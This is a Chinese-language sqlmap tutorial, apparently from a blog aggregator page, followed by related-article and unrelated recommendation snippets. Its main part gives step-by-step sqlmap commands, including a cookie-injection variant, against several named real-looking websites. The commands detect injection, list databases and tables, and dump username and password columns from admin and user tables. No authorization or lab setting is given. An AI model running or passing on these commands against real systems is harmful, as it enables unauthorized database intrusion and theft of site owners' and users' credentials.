sqlmap(网站数据库注入)
*教程
http://www.nxadmin.com/tools/1241.html
一、ASP网站
1.
sqlmap -u “http://www.czypjx.com/News_show.asp?id=110”
-u “检测是否存在注入”
返回数据库的名字
查看数据库信息及是否存在注入漏洞(绿色可以注入,黄色不可)
2.
sqlmap -u “http://www.czypjx.com/News_show.asp?id=110” --tables
猜解出所有表名
选择"user" "admin"
3.
sqlmap -u "http://www.czypjx.com/News_show.asp?id=110" --columns -T "user"
--columns 猜列名 根据user表
4.
sqlmap -u "http://www.czypjx.com/News_show.asp?id=110" --dump -C "username,password" -T "user"
--dump 下载数据 -C “username,password” 列名
二、PHP网站(一般是mysql的数据库)
1. 检测
sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”
2.是否dba权限
sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69” --is-dba
3.列出所有数据库
sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69” --dbs
4.查找自己的数据库
sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69” --current-db
5.查询所有表名
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --tables -D "ggec"
查询所有表名, 根据ggec数据库来查询
6.查询所有的列
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --colums -T “ggec_admin” -D "ggec"
“ggec_admin”是选择的表名
7.查询列的字段
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --dump -C “username,password” -T “ggec_admin” -D "ggec"
三、ASP网站的Cookie注入
1.
sqlmap -u "http://www.wisefund.com.cn/about.asp?id=56“
显示不能注入
修改为
sqlmap -u “http://www.wisefund.com.cn/about.asp ” --cookie “id=56” --level 2
--cookie “” 这里写ID的参数
有时这样就可以注入了
2.
sqlmap -u “http://www.wisefund.com.cn/about.asp ” --tables --cookie “id=56” --level 2
3.
sqlmap -u “http://www.wisefund.com.cn/about.asp ” --columns -T “user” --cookie “id=56” --level 2
4.
sqlmap -u “http://www.wisefund.com.cn/about.asp ”--dump -C “username,password” -T “user” --cookie “id=56” --level 2
*参考
http://wenku.baidu.com/link?url=2KJ2bgLFI3Fhknk0Pr3fAlMDmLr-jqG6fD9FaBdLqTFbNnHyVLy-NIjpgm5RsBDVoegjVFw1GAqg_QdgqljPUWKcvNyGFLIEVw3aj9ZuYwa
http://drops.wooyun.org/tips/143
http://it.100xuexi.com/view/otdetail/20131031/8158cdfa-e485-46f9-8067-a4ad4891d267.html
http://www.cnblogs.com/hongfei/p/3872156.html
sqlmap(网站数据库注入)的更多相关文章
- SQLMAP学习笔记2 Mysql数据库注入
SQLMAP学习笔记2 Mysql数据库注入 注入流程 (如果网站需要登录,就要用到cookie信息,通过F12开发者工具获取cookie信息) sqlmap -u "URL" - ...
- CentOS 7 通过SQLmap进行SQL注入
安装SQLmap: IP:192.168.94.11 渗透测试演练系统DVWA: IP:192.168.94.111 通过SQLmap检测SQL注入漏洞 : 1.安装SQLmap漏洞查看工具 2.安装 ...
- Access+Mssql+Oracle数据库注入
Access数据库注入 前言:在常见的注入测试中,由于每个数据库内置架构和应用不同,导致数据库类型将决定注入的手法,Access数据库是小型数据库类型,普遍用于小型WEB应用,其中Access注入手法 ...
- SqlMap之数据库操作语句总结
SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据.我们可以利用它执行特定的命令.查看文件.获取各种数据:当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满 ...
- 结合sqlmap进行sql注入过程
结合sqlmap进行sql注入:(-r后面是通过burp suite抓出来的请求包:-p后面是注入点,即该请求里携带的某个参数) Get请求的注入: ./sqlmap.py -r rss_test.t ...
- 【阿里云产品公测】利用PTS服务优化网站数据库读写性能
[阿里云产品公测]利用PTS服务优化网站数据库读写性能 作者:阿里云用户千鸟 写这个帖子主要也是因为在用PTS测试网站的时候,手动访问网站进入报错页面,主要原因是数据库连接对象存在问题,导致并发多的时 ...
- discuz网站数据库迁移
你的discuz网站数据库迁移,或者修改过改密码后,还要以下相关配置文件修改,才能不会出现1045错误 以windows系统为例:首先登陆远程桌面,在运行中输入cmd,单开命令模式,再输入 net ...
- Atitit.故障排除系列---php 程序网站数据库错误排除流程
Atitit.故障排除系列---php 程序网站数据库错误排除流程 Php页面报告的错误不能定位到myusql的db配置上...字说是db conn err Mysql 接入错误...大概查看哈能不能 ...
- Atitit.故障排除系列---php
计划网站数据库错误排除过程
Atitit.故障排除系列---php 计划网站数据库错误排除过程 Php页面报告的错误不能定位到myusql的db配置上...字说是db conn err Mysql 接入错误...大概查看哈能不能 ...
随机推荐
- python自动华 (三)
Python自动化 [第三篇]:Python基础-集合.文件操作.字符编码与转码.函数 1. 集合 1.1 特性 集合是一个无序的,不重复的数据组合,主要作用如下: 去重,把一 ...
- IDEA jetbrain Live Template
IDEA(jetbrain通用)优雅级使用教程 IDEA 强大的 Live Templates(转) 官网
- Verilog Tricks
1,可用generate产生512*FIFO 2,Vivado的warning也要全部排除 3,小module测完再往大module加 4,复位和IDLE处的置零操作一定要写全了 5,设计通信接收机时 ...
- js 弹层下面的body禁止滚动
弹窗是一种常见的交互方式,而蒙层是弹窗必不可少的元素,用于隔断页面与弹窗区块,暂时阻断页面的交互.但是,在蒙层元素中滑动的时候,滑到内容的尽头时,再继续滑动,蒙层底部的页面会开始滚动,显然这不是我们想 ...
- Flask 生成下载文件
1 后台程序直接生成文件内容 from flask import make_response @app.route('/testdownload', methods=['GET']) def test ...
- 黑马vue---46、vue使用过渡类名实现动画
黑马vue---46.vue使用过渡类名实现动画 一.总结 一句话总结: vue动画的过渡类名的时间点中没有设置样式的话就是默认的样式 使用 transition 元素,把 需要被动画控制的元素,包裹 ...
- Python全国二级等级考试(2019)
一.前言 2018年9月随着全国计算机等级考试科目中加入“二级Python”,也确立了Python在国内的地位,猪哥相信Python语言势必会像PS那般普及.不久的将来,谁会Python谁就能获得女神 ...
- 【Java/JDBC】利用ResultSetMetaData从数据库的某表中获取字段信息并存到csv文件
代码下载:https://files.cnblogs.com/files/xiandedanteng/FindNotnullColumns20191102-2.rar 这篇还不够完善,请看更完善的续篇 ...
- ubuntu下如何安装hg(mercurial)?
答: sudo apt-get install mercurial
- SQL-W3School-高级:SQL 撤销索引、表以及数据库
ylbtech-SQL-W3School-高级:SQL 撤销索引.表以及数据库 1.返回顶部 1. 通过使用 DROP 语句,可以轻松地删除索引.表和数据库. SQL DROP INDEX 语句 我们 ...